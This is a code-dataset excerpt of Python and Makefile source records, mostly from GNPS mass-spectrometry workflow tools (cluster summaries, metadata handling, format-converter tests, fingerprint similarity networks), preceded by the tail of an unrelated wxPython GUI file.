wx.StaticText( self.m_panel1, wx.ID_ANY, u\"min:\\nmax:\\navg:\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText4.Wrap( -1 )\n gSizer4.Add( self.m_staticText4, 0, wx.ALL, 3 )\n\n self.m_staticText5 = wx.StaticText( self.m_panel1, wx.ID_ANY, u\"min:\\nmax:\\navg:\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText5.Wrap( -1 )\n gSizer4.Add( self.m_staticText5, 0, wx.ALL, 3 )\n\n self.m_staticText6 = wx.StaticText( self.m_panel1, wx.ID_ANY, u\"min:\\nmax:\\navg:\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText6.Wrap( -1 )\n gSizer4.Add( self.m_staticText6, 0, wx.ALL, 3 )\n\n\n\n self.m_panel1.SetSizer( gSizer4 )\n self.m_panel1.Layout()\n gSizer4.Fit( self.m_panel1 )\n self.m_panel1.Layout()\n bSizer2.Add( self.m_panel1, 0.88, wx.EXPAND, 5 )\n\n\n gSizer1.Add( bSizer2, 1, wx.EXPAND, 5 )\n\n bSizer3 = wx.BoxSizer( wx.VERTICAL )\n bSizer31 = wx.BoxSizer( wx.VERTICAL )\n self.m_panel2 = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )\n self.m_panel2.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_MENU ) )\n\t\t\n self.m_staticText7 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"P0 = \", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText7.Wrap( -1 )\n bSizer31.Add( self.m_staticText7, 0, wx.ALL, 5 )\n\n self.m_staticText8 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"I0 = \", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText8.Wrap( -1 )\n bSizer31.Add( self.m_staticText8, 0, wx.ALL, 5 )\n\n self.m_staticText9 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"B = \", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText9.Wrap( -1 )\n bSizer31.Add( self.m_staticText9, 0, wx.ALL, 5 )\n\n self.m_staticText10 = wx.StaticText( self.m_panel2, wx.ID_ANY, u\"β = \", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText10.Wrap( -1 )\n bSizer31.Add( self.m_staticText10, 0, wx.ALL, 5 )\n\n\n self.m_panel2.SetSizer( bSizer31 )\n self.m_panel2.Layout()\n bSizer31.Fit( self.m_panel2 )\n bSizer3.Add( self.m_panel2, 0.9, wx.EXPAND, 5 )\n\n\n gSizer1.Add( bSizer3, 1, wx.EXPAND, 5 )\n\n\n self.SetSizer( gSizer1 )\n self.Layout()\n self.m_menubar1 = wx.MenuBar( 0 )\n self.m_fileMenu = wx.Menu()\n self.m_mbopenFile = wx.MenuItem( self.m_fileMenu, wx.ID_ANY, u\"Открыть\", wx.EmptyString, wx.ITEM_NORMAL )\n self.m_fileMenu.AppendItem( self.m_mbopenFile )\n\n self.m_fileMenu.AppendSeparator()\n\n self.m_mbexit = wx.MenuItem( self.m_fileMenu, wx.ID_ANY, u\"Выход\", wx.EmptyString, wx.ITEM_NORMAL )\n self.m_fileMenu.AppendItem( self.m_mbexit )\n\n self.m_menubar1.Append( self.m_fileMenu, u\"Файл\" )\n\n #self.m_menu3 = wx.Menu()\n #self.m_mbGraph1 = wx.MenuItem( self.m_menu3, wx.ID_ANY, u\"Данные 1\", wx.EmptyString, wx.ITEM_CHECK )\n #self.m_menu3.AppendItem( self.m_mbGraph1 )\n #self.m_mbGraph1.Check( True )\n\n #self.m_mbGraph2 = wx.MenuItem( self.m_menu3, wx.ID_ANY, u\"Данные 2\", wx.EmptyString, wx.ITEM_CHECK )\n #self.m_menu3.AppendItem( self.m_mbGraph2 )\n #self.m_mbGraph2.Check( True )\n\n #self.m_menubar1.Append( self.m_menu3, u\"Скрыть\" )\n\n self.SetMenuBar( self.m_menubar1 )\n\n\n\n #заготовки для графикa 1\n self.figure1 = Figure()\n\n self.canvas1 = FigureCanvas(self, wx.ID_ANY, self.figure1)\n bSizer2.Add(self.canvas1, 3, wx.LEFT | wx.TOP | wx.EXPAND)\n self.toolbar1 = NavigationToolbar2Wx(self.canvas1)\n self.toolbar1.Realize()\n bSizer2.Add(self.toolbar1, 0, wx.LEFT | wx.EXPAND)\n #self.Fit()\n #####\n\n #2\n self.figure2 = Figure()\n self.canvas2 = FigureCanvas(self, wx.ID_ANY, self.figure2)\n bSizer3.Add(self.canvas2, 3, wx.LEFT | wx.TOP | wx.EXPAND)\n self.toolbar2 = NavigationToolbar2Wx(self.canvas2)\n self.toolbar2.Realize()\n bSizer3.Add(self.toolbar2, 0, wx.LEFT | wx.EXPAND)\n\n #self.Fit()\n ##\n self.SetAutoLayout(True)\n self.Centre( wx.BOTH )\n self.SetIcon(wx.Icon('icon.ico', wx.BITMAP_TYPE_ICO))\n\n self.Refresh()\n\n\n def __del__( self ):\n pass\n\n\n" }, { "alpha_fraction": 0.6532846689224243, "alphanum_fraction": 0.6624087691307068, "avg_line_length": 44.75, "blob_id": "0fa4597242b72c92728ee4ae52bcbc416cbee639", "content_id": "938fcc06b8d26b65a214278adc4c07f7499f6ef7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 548, "license_type": "no_license", "max_line_length": 102, "num_lines": 12, "path": "/exe.py", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "from cx_Freeze import setup, Executable\nincludefiles = ['icon.ico']\nincludes = ['numpy.core.fromnumeric._methods', 'numpy.lib.format']\npackages = ['dateutil', 'matplotlib', 'datetime', 'numpy', 'wx', 'wx.xrc' 'functools',\n 'detectorApp', 'detectorForm', 'detectorData' ]\nsetup(\n name = 'DetectorInfo',\n version = '1.0',\n description = \"Lab1 script\",\n options = {'build.exe': {'packages':packages, 'include_files':includefiles, 'includes':includes}},\n executables = [Executable('main.py', base = \"Win32GUI\", icon=\"icon.ico\")]\n )" }, { "alpha_fraction": 0.6585366129875183, "alphanum_fraction": 0.7317073345184326, "avg_line_length": 24.33333396911621, "blob_id": "56663f1b3b06b4990ce148e355ff3d50f3059e41", "content_id": "24aa8f853b46dea076e65b10f855fda73486eadf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 82, "license_type": "no_license", "max_line_length": 37, "num_lines": 3, "path": "/fbp/test.py", "repo_name": "eskaler/Uragan", "src_encoding": "UTF-8", "text": "from detectorData import DetectorData\n\ndd = DetectorData(\"MNM_2017_08.dat\")\n\n\n\n\n\n\n" } ]
8
madeleineernst/GNPS_Workflows
https://github.com/madeleineernst/GNPS_Workflows
aa40e76081bf98334443971f6b68358f9090a2b2
a7b2b841ead898552fdb6a24879c6c28a64b7a50
66c20aaeb41c0e49c35e5c1cd6d9d7eabd850b5d
refs/heads/master
2020-08-29T15:08:31.516933
2019-10-26T23:00:07
2019-10-26T23:00:07
218,069,981
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8218390941619873, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 27.83333396911621, "blob_id": "8dcc6491b4788ed1480a4b4377eb490fe04fddb6", "content_id": "63fa8631888d012253d8686fdd6704ec98f79359", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 174, "license_type": "no_license", "max_line_length": 39, "num_lines": 6, "path": "/search_single_spectrum/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=search_single_spectrum\nTOOL_FOLDER_NAME=search_single_spectrum\nWORKFLOW_VERSION=release_13\n\n" }, { "alpha_fraction": 0.6403359770774841, "alphanum_fraction": 0.6455265879631042, "avg_line_length": 40.22957229614258, "blob_id": "00edba20f9bc7cc7de07869ade4bc7e58bc3fd49", "content_id": "fcbcbc1c16818c15827879da8af2618f5100f7c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10596, "license_type": "no_license", "max_line_length": 292, "num_lines": 257, "path": "/feature-based-molecular-networking/tools/feature-based-molecular-networking/scripts/clusterinfosummary_for_featurenetworks.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\nimport sys\nimport getopt\nimport os\nimport json\nimport argparse\nimport statistics\nimport glob\nimport ming_spectrum_library\nimport ming_proteosafe_library\nfrom collections import defaultdict\nimport glob\nimport pandas as pd\n\ndef determine_input_files(header_list):\n filenames = []\n filename_headers = []\n for header in header_list:\n #if header.find(\"mzXML\") != -1 or header.find(\"mzML\") != -1:\n if \"Peak area\" in header:\n filenames.append(header.replace(\"Peak area\", \"\").replace(\"filtered\", \"\").rstrip())\n filename_headers.append(header.rstrip(\"\\n\"))\n\n #If the set of filenames is empty, then we will fall back and use elimination\n blacklisted_headers = [\"row ID\", \"row m/z\", \"row retention time\"]\n if len(filenames) == 0:\n for header in header_list:\n if len(header) < 2:\n continue\n if header in blacklisted_headers:\n continue\n filenames.append(header.replace(\"Peak area\", \"\").replace(\"filtered\", \"\").rstrip())\n filename_headers.append(header)\n\n print(filename_headers, filenames)\n\n return filenames, filename_headers\n\ndef load_group_attribute_mappings(metadata_filename):\n filename_header = \"filename\"\n\n attributes_to_groups_mapping = defaultdict(set)\n group_to_files_mapping = defaultdict(list)\n \n metadata_df = pd.read_csv(metadata_filename, sep=\"\\t\")\n print(metadata_df.head())\n record_list = metadata_df.to_dict(orient=\"records\")\n for record in record_list:\n for header in record:\n if \"ATTRIBUTE_\" in header:\n filename = record[filename_header].rstrip().replace('\\n', '').replace('\\r', '')\n group_name = str(record[header]).rstrip().replace('\\n', '').replace('\\r', '')\n attribute = header.rstrip().replace('\\n', '').replace('\\r', '')\n if len(filename) > 2:\n group_to_files_mapping[group_name].append(filename)\n attributes_to_groups_mapping[attribute].add(group_name)\n\n return group_to_files_mapping, attributes_to_groups_mapping\n\ndef determine_group_abundances(group_to_file_mapping, per_file_abundances, operation=\"Mean\"):\n group_abundances_intermediate = defaultdict(list)\n group_abundances = defaultdict(lambda: 0.0)\n\n file_to_group_mapping = defaultdict(list)\n for group_name in group_to_file_mapping:\n for filename in group_to_file_mapping[group_name]:\n file_to_group_mapping[filename].append(group_name)\n\n for file_abundance in per_file_abundances:\n filename = file_abundance[0].replace(\"filtered\", \"\").replace(\"Peak area\", \"\").rstrip()\n intensity = file_abundance[1]\n for group in file_to_group_mapping[filename]:\n group_abundances_intermediate[group].append(intensity)\n\n\n for group in group_abundances_intermediate:\n if operation == \"Sum\":\n group_abundances[group] = sum(group_abundances_intermediate[group])\n if operation == \"Mean\":\n if len(group_abundances_intermediate[group]) == 0:\n group_abundances[group] = 0.0\n else:\n group_abundances[group] = statistics.mean(group_abundances_intermediate[group])\n\n return group_abundances\n\n###Reading from Robin's output tool\ndef enrich_adduct_annotations(cluster_object, quant_table_object):\n if \"correlation group ID\" in quant_table_object:\n cluster_object[\"Correlated Features Group ID\"] = quant_table_object[\"correlation group ID\"]\n\n if \"annotation network number\" in quant_table_object:\n cluster_object[\"Annotated Adduct Features ID\"] = quant_table_object[\"annotation network number\"]\n\n if \"best ion\" in quant_table_object:\n cluster_object[\"Best Ion\"] = quant_table_object[\"best ion\"]\n\n if \"neutral M mass\" in quant_table_object:\n cluster_object[\"neutral M mass\"] = quant_table_object[\"neutral M mass\"]\n\n if \"auto MS2 verify\" in quant_table_object:\n cluster_object[\"MS2 Verification Comment\"] = quant_table_object[\"auto MS2 verify\"]\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Creating Clustering Info Summary')\n parser.add_argument('params_xml', help='params_xml')\n parser.add_argument('consensus_feature_file', help='Consensus Quantification File')\n parser.add_argument('metadata_folder', help='metadata metadata_folder')\n parser.add_argument('mgf_filename', help='mgf_filename')\n parser.add_argument('output_clusterinfo_summary', help='output file')\n args = parser.parse_args()\n\n param_obj = ming_proteosafe_library.parse_xml_file(open(args.params_xml))\n\n task_id = param_obj[\"task\"][0]\n\n group_to_files_mapping = defaultdict(list)\n attributes_to_groups_mapping = defaultdict(set)\n\n metadata_files = glob.glob(os.path.join(args.metadata_folder, \"*\"))\n if len(metadata_files) == 1:\n group_to_files_mapping, attributes_to_groups_mapping = load_group_attribute_mappings(metadata_files[0])\n\n ROW_NORMALIZATION = \"None\"\n try:\n ROW_NORMALIZATION = param_obj[\"QUANT_FILE_NORM\"][0]\n except:\n ROW_NORMALIZATION = \"None\"\n\n GROUP_COUNT_AGGREGATE_METHOD = \"Sum\"\n try:\n GROUP_COUNT_AGGREGATE_METHOD = param_obj[\"GROUP_COUNT_AGGREGATE_METHOD\"][0]\n except:\n GROUP_COUNT_AGGREGATE_METHOD = \"None\"\n\n\n quantification_df = pd.read_csv(args.consensus_feature_file)\n quantification_list = quantification_df.to_dict(orient=\"records\")\n\n input_filenames, input_filename_headers = determine_input_files(quantification_list[0].keys())\n\n ### Filling in Quantification table if it is missing values\n for quantification_object in quantification_list:\n ###Handling empty quantification\n for filename in input_filename_headers:\n try:\n if len(quantification_object[filename]) == 0:\n #print(filename, quantification_object[filename], quantification_object[\"row ID\"])\n quantification_object[filename] = 0\n except:\n x = 1\n\n print(\"Number of Features\", len(quantification_list))\n\n #Doing row sum normalization\n if ROW_NORMALIZATION == \"RowSum\":\n print(\"ROW SUM NORM\")\n for filename_header in input_filename_headers:\n file_quants = [float(quantification_object[filename_header]) for quantification_object in quantification_list]\n summed_file_quants = sum(file_quants)\n #Handling zero column\n if summed_file_quants > 0:\n for quantification_object in quantification_list:\n quantification_object[filename_header] = float(quantification_object[filename_header]) / sum(file_quants) * 1000000\n\n \"\"\"Loading MS2 Spectra\"\"\"\n mgf_collection = ming_spectrum_library.SpectrumCollection(args.mgf_filename)\n mgf_collection.load_from_file()\n\n clusters_list = []\n for quantification_object in quantification_list:\n\n cluster_obj = {}\n cluster_obj[\"cluster index\"] = quantification_object[\"row ID\"]\n cluster_obj[\"precursor mass\"] = \"{0:.4f}\".format(float(quantification_object[\"row m/z\"]))\n cluster_obj[\"RTConsensus\"] = \"{0:.4f}\".format(float(quantification_object[\"row retention time\"]))\n\n all_charges = []\n\n \"\"\"Checking about the charge of this cluster\"\"\"\n try:\n spectrum_object = mgf_collection.scandict[int(cluster_obj[\"cluster index\"])]\n charge = int(spectrum_object.charge)\n except:\n charge = 0\n\n \"\"\"Checking if this spectrum has no peaks\"\"\"\n # try:\n # spectrum_object = mgf_collection.scandict[int(cluster_obj[\"cluster index\"])]\n #\n # except:\n # continue\n\n all_files = [os.path.basename(filename) for filename in input_filename_headers if float(quantification_object[filename]) > 0]\n abundance_per_file = [(os.path.basename(filename), float(quantification_object[filename])) for filename in input_filename_headers]\n all_abundances = [float(quantification_object[filename]) for filename in input_filename_headers]\n\n if charge != 0:\n cluster_obj[\"parent mass\"] = \"{0:.4f}\".format(float(quantification_object[\"row m/z\"]) * charge - charge + 1)\n else:\n cluster_obj[\"parent mass\"] = \"{0:.4f}\".format(float(quantification_object[\"row m/z\"]))\n cluster_obj[\"precursor charge\"] = charge\n\n try:\n cluster_obj[\"RTMean\"] = statistics.mean(all_retention_times)\n cluster_obj[\"RTStdErr\"] = statistics.stdev(all_retention_times)\n except:\n cluster_obj[\"RTMean\"] = cluster_obj[\"RTConsensus\"]\n cluster_obj[\"RTStdErr\"] = 0\n\n cluster_obj[\"GNPSLinkout_Cluster\"] = 'https://gnps.ucsd.edu/ProteoSAFe/result.jsp?task=%s&view=view_all_clusters_withID&show=true#{\"main.cluster index_lowerinput\":\"%s\",\"main.cluster index_upperinput\":\"%s\"}' % (task_id, quantification_object[\"row ID\"], quantification_object[\"row ID\"])\n cluster_obj[\"sum(precursor intensity)\"] = sum(all_abundances)\n cluster_obj[\"SumPeakIntensity\"] = sum(all_abundances)\n cluster_obj[\"number of spectra\"] = len(all_files)\n cluster_obj[\"UniqueFileSourcesCount\"] = len(all_files)\n\n group_abundances = determine_group_abundances(group_to_files_mapping, abundance_per_file, operation=GROUP_COUNT_AGGREGATE_METHOD)\n\n default_groups = [\"G1\", \"G2\", \"G3\", \"G4\", \"G5\", \"G6\"]\n for group in group_to_files_mapping:\n group_header = \"GNPSGROUP:\" + group\n if group in default_groups:\n continue\n cluster_obj[group_header] = group_abundances[group]\n\n for group in default_groups:\n cluster_obj[group] = group_abundances[group]\n\n #Writing attributes\n for attribute in attributes_to_groups_mapping:\n groups_to_include = []\n for group in attributes_to_groups_mapping[attribute]:\n if group_abundances[group] > 0.0:\n groups_to_include.append(group)\n if len(groups_to_include) == 0:\n cluster_obj[attribute] = \"\"\n else:\n cluster_obj[attribute] = \",\".join(groups_to_include)\n\n\n \"\"\"\n Enriching the cluster info with adduct collapsing information\n \"\"\"\n enrich_adduct_annotations(cluster_obj, quantification_object)\n\n\n clusters_list.append(cluster_obj)\n\n pd.DataFrame(clusters_list).to_csv(args.output_clusterinfo_summary, sep=\"\\t\", index=False)\n\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6543371677398682, "alphanum_fraction": 0.6590834856033325, "avg_line_length": 45.25757598876953, "blob_id": "d41ca60861141412a3650fd483df2af5366d627d", "content_id": "46dff26624e859c5e9cc8332942b16735e848b97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6110, "license_type": "no_license", "max_line_length": 156, "num_lines": 132, "path": "/molnetenhancer/tools/molnetenhancer/metabodisttree.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "import argparse\nimport os\nimport requests\nimport shutil\nimport pandas as pd\nimport proteosafe\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('GNPS', help='enter your GNPS job ID')\nparser.add_argument('molnetenhancer_input_folder', help='molnetenhancer_input')\nparser.add_argument('output_folder', help='output_folder')\nargs = parser.parse_args()\n\ntask_id = args.GNPS\n\nSERVER_BASE = \"http://dorresteinappshub.ucsd.edu:5024\"\ntask_information = proteosafe.get_task_information(\"gnps.ucsd.edu\", task_id)\nprint(task_information)\n\nclassyfire_result_filename = os.path.join(args.molnetenhancer_input_folder, \"ClassyFireResults_Network.txt\")\n\nif task_information[\"workflow\"] == \"METABOLOMICS-SNETS-V2\":\n\n try:\n manifest_url = \"https://gnps.ucsd.edu/ProteoSAFe/DownloadResultFile?task={}&block=main&file=qiime2_output/qiime2_manifest.tsv\".format(task_id)\n metadata_url = \"https://gnps.ucsd.edu/ProteoSAFe/DownloadResultFile?task={}&block=main&file=qiime2_output/qiime2_metadata.tsv\".format(task_id)\n quantification_url = \"https://gnps.ucsd.edu/ProteoSAFe/DownloadResultFile?task={}&block=main&file=cluster_buckets/\".format(task_id)\n\n manifest_filename = os.path.join(args.output_folder, \"qiime2_manifest.tsv\")\n metadata_filename = os.path.join(args.output_folder, \"qiime2_metadata.tsv\")\n quantification_filename = os.path.join(args.output_folder, \"quantification.tsv\")\n \n #Pull down the qiime2 data\n with open(manifest_filename, 'wb') as f:\n f.write(requests.get(manifest_url).content)\n\n with open(metadata_filename, 'wb') as f:\n f.write(requests.get(metadata_url).content)\n\n with open(quantification_filename, 'wb') as f:\n f.write(requests.get(quantification_url).content)\n\n metabodist_endpoint = SERVER_BASE + \"/processmetabodisttree\"\n\n files = {'manifest': open(manifest_filename, 'r'), \\\n 'metadata': open(metadata_filename, 'r'), \\\n 'quantification': open(quantification_filename, 'r'), \\\n 'classyfireresult': open(classyfire_result_filename, 'r')}\n\n r_post = requests.post(metabodist_endpoint, files=files, data={\"type\":\"classical\"})\n response_dict = r_post.json()\n \n with open(os.path.join(args.output_folder, \"metabodistree_table.qza\"), 'wb') as f:\n r = requests.get(SERVER_BASE + response_dict[\"table_qza\"], stream=True)\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n\n with open(os.path.join(args.output_folder, \"metabodistree_emperor.qzv\"), 'wb') as f:\n r = requests.get(SERVER_BASE + response_dict[\"emperor_qzv\"], stream=True)\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n\n except KeyboardInterrupt:\n raise\n except:\n print(\"Error\")\n exit(0)\n\nif task_information[\"workflow\"] == \"FEATURE-BASED-MOLECULAR-NETWORKING\":\n #Workflow versions will eventually be supported\n # task_information[\"workflow_version\"] not in [\"1.2.3\", \"1.2.5\", \"release_8\"]\n\n try:\n manifest_url = \"https://gnps.ucsd.edu/ProteoSAFe/DownloadResultFile?task={}&block=main&file=qiime2_output/qiime2_manifest.tsv\".format(task_id)\n metadata_url = \"https://gnps.ucsd.edu/ProteoSAFe/DownloadResultFile?task={}&block=main&file=qiime2_output/qiime2_metadata.tsv\".format(task_id)\n quantification_url = \"https://gnps.ucsd.edu/ProteoSAFe/DownloadResultFile?task={}&block=main&file=quantification_table_reformatted/\".format(task_id)\n\n manifest_filename = os.path.join(args.output_folder, \"qiime2_manifest.tsv\")\n metadata_filename = os.path.join(args.output_folder, \"qiime2_metadata.tsv\")\n quantification_filename = os.path.join(args.output_folder, \"quantification.tsv\")\n \n #Pull down the qiime2 data\n with open(manifest_filename, 'wb') as f:\n f.write(requests.get(manifest_url).content)\n\n with open(metadata_filename, 'wb') as f:\n f.write(requests.get(metadata_url).content)\n\n with open(quantification_filename, 'wb') as f:\n f.write(requests.get(quantification_url).content)\n\n #Rewriting the quantification file format\n bucket_table_df = pd.read_csv(quantification_filename, sep = ',')\n bucket_table_df.columns = bucket_table_df.columns.str.replace(' Peak area','')\n bucket_table_df.columns = bucket_table_df.columns.str.replace('.mzXML','')\n bucket_table_df.columns = bucket_table_df.columns.str.replace('.mzML','')\n bucket_table_df.columns = bucket_table_df.columns.str.replace('.mgf','')\n bucket_table_df = bucket_table_df.drop(['row m/z', 'row number of detected peaks', 'row retention time'], axis=1)\n bucket_table_df = bucket_table_df.rename(columns = {'row ID':'#OTU ID'})\n\n cols = [c for c in bucket_table_df.columns if not(\"Unnamed: \" in c)]\n bucket_table_df = bucket_table_df[cols]\n\n bucket_table_df.to_csv(quantification_filename, sep=\"\\t\", index=False)\n\n \n metabodist_endpoint = SERVER_BASE + \"/processmetabodisttree\"\n\n files = {'manifest': open(manifest_filename, 'r'), \\\n 'metadata': open(metadata_filename, 'r'), \\\n 'quantification': open(quantification_filename, 'r'), \\\n 'classyfireresult': open(classyfire_result_filename, 'r')}\n\n r_post = requests.post(metabodist_endpoint, files=files)\n response_dict = r_post.json()\n \n with open(os.path.join(args.output_folder, \"metabodistree_table.qza\"), 'wb') as f:\n r = requests.get(SERVER_BASE + response_dict[\"table_qza\"], stream=True)\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n\n with open(os.path.join(args.output_folder, \"metabodistree_emperor.qzv\"), 'wb') as f:\n r = requests.get(SERVER_BASE + response_dict[\"emperor_qzv\"], stream=True)\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n\n except KeyboardInterrupt:\n raise\n except:\n print(\"Error\")\n exit(0)\n " }, { "alpha_fraction": 0.6955307126045227, "alphanum_fraction": 0.7112430334091187, "avg_line_length": 47.54237365722656, "blob_id": "12f73306a816ca2ed247fc024bfac614d570bb5c", "content_id": "b8cedf0d4d33f3f97d882bf8c75843027c6e62cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2864, "license_type": "no_license", "max_line_length": 182, "num_lines": 59, "path": "/feature-based-molecular-networking/test/test_converters.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "import unittest\nimport sys\nimport filecmp\nsys.path.insert(0, \"../tools/feature-based-molecular-networking/scripts/\")\nimport msdial_formatter\nimport progenesis_formatter\nimport metaboscape_formatter\nimport xcms_formatter\nimport mzmine2_formatter\nimport openms_formatter\n\nclass TestLoaders(unittest.TestCase):\n\n def test_msdial(self):\n msdial_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/MS-DIAL/MS-DIAL-GNPS_AG_test_featuretable.txt\", \\\n \"./msdial_output.csv\")\n\n self.assertTrue(filecmp.cmp(\"./msdial_output.csv\", \"./reference_input_file_for_formatter/MS-DIAL/MS-DIAL-GNPS_AG_test_featuretable_reference_output_file.csv\", shallow=False))\n\n def test_msdial_ims(self):\n msdial_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/MS-DIAL/GnpsTable_1_20198191357_PASEF.txt\", \\\n \"./msdial_ims_output.csv\")\n\n self.assertTrue(filecmp.cmp(\"./msdial_ims_output.csv\", \"./reference_input_file_for_formatter/MS-DIAL/GnpsTable_1_20198191357_PASEF_output.csv\", shallow=False))\n\n def test_progenesis(self):\n compound_to_scan_mapping = progenesis_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/Progensis_MSE/SONAR_20_Yeast_Peaks.csv\", \\\n \"./progenesis_output.csv\")\n\n progenesis_formatter.convert_mgf(\"./reference_input_file_for_formatter/Progensis_MSE/SONAR_20_Yeast_MSMS.msp\", \"progenesis_output.mgf\", compound_to_scan_mapping)\n\n compound_to_scan_mapping = progenesis_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/Progensis_MSE/Neg_MSE_Catechin.csv\", \\\n \"./progenesis_output_catechin.csv\")\n\n progenesis_formatter.convert_mgf(\"./reference_input_file_for_formatter/Progensis_MSE/Neg_MSE_Catechin.msp\", \"progenesis_output_catechin.mgf\", compound_to_scan_mapping)\n\n def test_metaboscape(self):\n metaboscape_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/MetaboScape/Lipids.msmsonly.csv\", \\\n \"./metaboscape_output.csv\")\n\n def test_mzmine2(self):\n mzmine2_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/mzmine2/MZmine-GNPS_AG_test_featuretable.csv\", \\\n \"./mzmine_output.csv\")\n\n def test_openms(self):\n openms_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/openms/textexporter-00000.csv\", \\\n \"./openms_output.csv\")\n\n def test_xcms3(self):\n xcms_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/xcms3/XCMS3-GNPS_AG_test_featuretable.txt\", \\\n \"./xcms3_output.csv\")\n\n def test_xcms3_iin(self):\n xcms_formatter.convert_to_feature_csv(\"./reference_input_file_for_formatter/xcms3/camera_iin_quant_table_sub.txt\", \\\n \"./xcms3_output_iin.csv\")\n\n\nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.6293237209320068, "alphanum_fraction": 0.6427465081214905, "avg_line_length": 26.28169059753418, "blob_id": "9d8826b36d14c0c685dd9f7a35c8158a7c4df1d2", "content_id": "1bfb2a830c3e631cb6ad67542b1b30d222b2afd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1937, "license_type": "no_license", "max_line_length": 106, "num_lines": 71, "path": "/qemistree/tools/qemistree/fingerprint_network.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport sys\nimport getopt\nimport os\nimport pandas as pd\nimport argparse\nimport glob\n\ndef similarity(fingerprint_dict1, fingerprint_dict2):\n dict1_fingerprints = set([key for key in fingerprint_dict1 if fingerprint_dict1[key] > 0.5])\n dict2_fingerprints = set([key for key in fingerprint_dict2 if fingerprint_dict2[key] > 0.5])\n\n intersection = dict1_fingerprints & dict2_fingerprints\n union = dict1_fingerprints | dict2_fingerprints\n \n jaccard_index = float(len(intersection))/float(len(union))\n \n return jaccard_index\n\ndef main():\n parser = argparse.ArgumentParser(description='Annotate spectra')\n parser.add_argument(\"fingerprint_summary_folder\")\n parser.add_argument(\"output_folder\")\n\n args = parser.parse_args()\n input_filename = os.path.join(args.fingerprint_summary_folder, \"summary_fingerprints.tsv\")\n df = pd.read_csv(input_filename, sep=\"\\t\")\n\n all_records = df.to_dict(orient=\"records\")\n all_records_reformatted = []\n\n for record in all_records:\n new_dict = {}\n new_dict[\"feature_id\"] = record[\"feature_id\"]\n record.pop(\"feature_id\")\n new_dict[\"fingerprint_scores\"] = record\n all_records_reformatted.append(new_dict)\n\n output_list = []\n for record1 in all_records_reformatted:\n for record2 in all_records_reformatted:\n if int(record1[\"feature_id\"]) <= int(record2[\"feature_id\"]):\n continue\n\n output_dict = {}\n output_dict[\"SCAN1\"] = record1[\"feature_id\"]\n output_dict[\"SCAN2\"] = record2[\"feature_id\"]\n\n sim = similarity(record1[\"fingerprint_scores\"], record2[\"fingerprint_scores\"])\n\n output_dict[\"sim\"] = sim\n\n output_list.append(output_dict)\n\n pd.DataFrame(output_list).to_csv(os.path.join(args.output_folder, \"pairs.tsv\"), sep=\"\\t\", index=False)\n\n\n \n \n\n\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6477294564247131, "alphanum_fraction": 0.6517874598503113, "avg_line_length": 44.394737243652344, "blob_id": "d94b5d0aeb76dfcdbd6b4987627c144e9d6c32c7", "content_id": "16bf10231bab484a641eb70af1f58feed10ebdaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5175, "license_type": "no_license", "max_line_length": 247, "num_lines": 114, "path": "/qemistree/tools/qemistree/qemistree.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport sys\nimport getopt\nimport os\nimport pandas as pd\nimport argparse\n\ndef main():\n parser = argparse.ArgumentParser(description='Annotate spectra')\n parser.add_argument(\"input_sirius_mgf\")\n parser.add_argument(\"input_quant_table\")\n parser.add_argument(\"input_metadata_table\")\n parser.add_argument(\"output_folder\")\n parser.add_argument(\"conda_activate_bin\")\n 